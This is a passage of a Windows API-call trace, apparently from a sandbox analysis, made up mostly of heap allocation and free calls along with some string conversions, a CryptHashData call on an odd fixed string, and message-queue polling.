lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e27e8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0129.761] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0129.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafe8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0129.762] CryptHashData (hHash=0x41ac200, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0129.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0129.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0129.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0129.763] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0129.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0129.764] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0129.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0129.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0129.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0129.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0129.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0129.765] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0129.766] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.767] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0129.767] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0129.767] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0129.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0129.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0129.768] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0129.769] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0129.769] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392538 | out: hHeap=0x1780000) returned 1 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0129.769] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0129.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0129.770] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caef8 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0129.770] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0129.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0129.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0129.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0129.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0129.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0129.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0129.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0129.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0129.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0129.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0129.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0129.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0129.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0129.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0129.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0129.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 